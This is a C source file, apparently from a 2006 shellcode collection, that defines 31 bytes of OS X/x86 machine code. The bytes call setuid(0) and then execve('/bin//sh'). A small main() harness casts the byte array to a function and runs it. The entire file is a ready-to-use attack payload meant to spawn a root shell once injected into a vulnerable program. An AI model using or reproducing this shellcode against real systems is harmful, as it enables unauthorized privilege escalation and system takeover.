/*
 * revenge-setuid-osx.c, v1.0 2006/12/11 16:30
 *
 * osx/x86 setuid(0) + execve("/bin//sh",["/bin//sh"],NULL) shellcode
 *
 * http://www.0xcafebabe.it
 * <revenge@0xcafebabe.it>
 *
 * 31 bytes
 * [ (setuid 8 bytes) + (execve 23 bytes) ]
 *
 */

char shellcode[] =
    "\x31\xc0\x50\x50\xb0\x17\xcd\x80"
    "\x99\x52\x68\x2f\x2f\x73\x68\x68"
    "\x2f\x62\x69\x6e\x89\xe3\x52\x54"
    "\x54\x53\x53\xb0\x3b\xcd\x80";

int main (int ac, char **av)
{
    void    (*fp)(void) = (void (*)(void))shellcode;
    fp();
}